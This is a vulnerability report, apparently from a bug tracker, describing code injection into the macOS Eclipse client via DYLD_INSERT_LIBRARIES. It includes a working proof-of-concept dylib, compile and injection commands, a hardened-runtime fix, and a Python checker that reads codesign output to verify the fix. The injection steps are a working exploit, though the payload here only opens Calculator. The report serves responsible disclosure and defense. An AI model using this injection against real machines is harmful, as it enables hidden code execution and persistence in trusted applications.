Created attachment 283904: POC of vulnerability execution

Vulnerability description

There is a code injection vulnerability in your macOS desktop client. Any malicious application running with standard user permissions is able to exploit this vulnerability and execute code in your application's context.

Requirements

In order to exploit this vulnerability, a victim has to have a malicious dylib on the device.

Proof of Concept / Steps to reproduce

To display the impact I've prepared a proof of concept where a malicious user without root permissions opens a calculator from Eclipse's context.

1. Create a new dylib with the following contents:

    #include <stdio.h>
    #include <stdlib.h>
    #include <syslog.h>

    /* Runs automatically when dyld loads the library into the target process. */
    __attribute__((constructor))
    static void customConstructor(int argc, const char **argv)
    {
        printf("Hello from dylib!\n");
        /* argv[0] is the host binary, here the Eclipse launcher. */
        syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
        system("open -a Calculator");
    }

2. Compile it using gcc:

    gcc -dynamiclib evil.c -o evil.dylib

3. Inject into the Eclipse binary:

    DYLD_INSERT_LIBRARIES=evil.dylib /Applications/Eclipse.app/Contents/MacOS/eclipse

4. Calculator should be run in Eclipse's context.

Impact

In the proof of concept I showed that any malicious dylib is able to execute code in Eclipse's context. This can easily aid a malicious user with a method of persistence to maintain access to the compromised machine.

Recommendations

Assuming that the desktop client has been compiled using Xcode, a developer needs to turn on the "Hardened Runtime" capability, making sure that the "Allow DYLD Environment Variables" option is turned off.
Additional information: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/
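A check a maintainer can use to confirm the recommended fix actually landed in the shipped binary, added here as an example and not part of the report or of Eclipse: it reads the CodeDirectory flags and entitlements that `codesign` reports and decides whether dyld would still honour DYLD_INSERT_LIBRARIES. It assumes the `codesign -dv --verbose=4` and `codesign -d --entitlements :-` output formats; the pure functions take captured text so they run off-Mac, and the sample signatures in the test are constructed.

```python
"""Decide from codesign output whether DYLD_INSERT_LIBRARIES injection is blocked."""
import plistlib
import re
import subprocess
import sys

CS_RESTRICT = 0x800       # restricted binary: dyld ignores DYLD_* outright
CS_REQUIRE_LV = 0x2000    # signature explicitly requests library validation
CS_RUNTIME = 0x10000      # hardened runtime enabled
ALLOW_DYLD_ENV = "com.apple.security.cs.allow-dyld-environment-variables"
DISABLE_LIB_VALIDATION = "com.apple.security.cs.disable-library-validation"


def parse_cs_flags(codesign_verbose: str) -> int:
    """Extract the numeric CodeDirectory flags from `codesign -dv --verbose=4` output."""
    m = re.search(r"flags=0x([0-9a-fA-F]+)", codesign_verbose)
    return int(m.group(1), 16) if m else 0   # unsigned binaries report no flags


def parse_entitlements(blob: bytes) -> dict:
    """Parse the XML plist printed by `codesign -d --entitlements :-` (empty if none)."""
    try:
        return plistlib.loads(blob) if blob.strip() else {}
    except plistlib.InvalidFileException:
        return {}


def assess(codesign_verbose: str, entitlements_plist: bytes) -> dict:
    """Combine signature flags and entitlements into an injection verdict."""
    flags = parse_cs_flags(codesign_verbose)
    ents = parse_entitlements(entitlements_plist)
    hardened = bool(flags & CS_RUNTIME)
    # Hardened runtime makes dyld drop DYLD_* variables unless the app opts back in.
    env_honored = not (flags & CS_RESTRICT) and (not hardened or bool(ents.get(ALLOW_DYLD_ENV)))
    # Library validation (implied by hardened runtime) admits only dylibs signed by the
    # same Team ID or by Apple, unless the app disables it.
    lib_validation = (hardened or bool(flags & CS_REQUIRE_LV)) and not ents.get(DISABLE_LIB_VALIDATION)
    return {
        "hardened_runtime": hardened,
        "dyld_env_honored": env_honored,
        "library_validation": lib_validation,
        # The reported PoC needs both: the variable honoured and an unsigned dylib accepted.
        "unsigned_dylib_injectable": env_honored and not lib_validation,
    }


def check_binary(path: str) -> dict:
    """Run codesign against a real Mach-O (macOS only) and assess the result."""
    verbose = subprocess.run(["codesign", "-dv", "--verbose=4", path],
                             capture_output=True, text=True).stderr
    ents = subprocess.run(["codesign", "-d", "--entitlements", ":-", path],
                          capture_output=True).stdout
    return assess(verbose, ents)


if __name__ == "__main__":
    print(check_binary(sys.argv[1]))
```

A result with `unsigned_dylib_injectable` still `True` after the Xcode change means the shipped launcher was not re-signed with the hardened-runtime flag, or the opt-out entitlements are present.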